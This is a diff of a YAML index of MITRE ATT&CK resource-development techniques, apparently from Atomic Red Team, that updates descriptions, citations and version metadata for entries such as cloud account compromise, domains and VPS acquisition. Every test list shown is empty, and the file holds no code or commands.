       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -52495,10 +53158,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -52506,9 +53178,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -52559,11 +53230,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52576,7 +53246,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -52611,22 +53281,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -52647,7 +53320,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -52686,6 +53359,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52741,7 +53418,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -52799,7 +53475,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -52879,7 +53554,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -52939,7 +53613,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -52961,7 +53634,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -52980,42 +53653,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -53024,22 +53665,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -53053,7 +53725,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -53140,11 +53812,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -53204,7 +53875,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -53246,7 +53916,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53261,7 +53931,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -53352,11 +54021,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -53389,15 +54057,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -53481,7 +54150,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -53535,7 +54203,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -53586,36 +54253,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1588.002
-        url: https://attack.mitre.org/techniques/T1588/002
-      - source_name: Recorded Future Beacon 2019
-        url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
-        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
-          Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
-      - source_name: Analyzing CS Dec 2020
-        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
-        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
-          Fun and Profit. Retrieved October 12, 2021.
-      modified: '2021-10-17T16:17:55.499Z'
+      modified: '2024-09-16T16:20:16.431Z'
       name: Tool
       description: |-
         Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -53624,21 +54265,47 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - SOCCRATES
+      - Mnemonic AS
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+      created: '2020-10-01T02:08:33.977Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1588/002
+        external_id: T1588.002
+      - source_name: Analyzing CS Dec 2020
+        description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+          Fun and Profit. Retrieved October 12, 2021.
+        url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+      - source_name: Recorded Future Beacon 2019
+        description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+          Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584.006:
     technique:
-      modified: '2023-04-12T20:19:21.620Z'
+      modified: '2024-10-15T16:44:09.114Z'
       name: Web Services
       description: 'Adversaries may compromise access to third-party web services that
         can be used during targeting. A variety of popular websites exist for legitimate
@@ -53684,17 +54351,16 @@ resource-development:
         external_id: T1584.006
       - source_name: Recorded Future Turla Infra 2020
         description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
-          Tracking Turla Infrastructure. Retrieved October 20, 2020.'
-        url: https://www.recordedfuture.com/turla-apt-infrastructure/
+          Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+        url: https://www.recordedfuture.com/research/turla-apt-infrastructure
       - source_name: ThreatConnect Infrastructure Dec 2020
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.001:
     technique:
@@ -53720,7 +54386,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:37:34.563Z'
       name: Social Media Accounts
       description: "Adversaries may create and cultivate social media accounts that
         can be used during targeting. Adversaries can create social media accounts
@@ -53752,8 +54418,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Persona: Social Media'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.004:
     technique:
@@ -53780,7 +54444,7 @@ resource-development:
         url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
         description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
           Exploitation. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:07:53.803Z'
       name: Exploits
       description: |-
         Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53804,8 +54468,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.003:
     technique:
@@ -53831,7 +54493,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
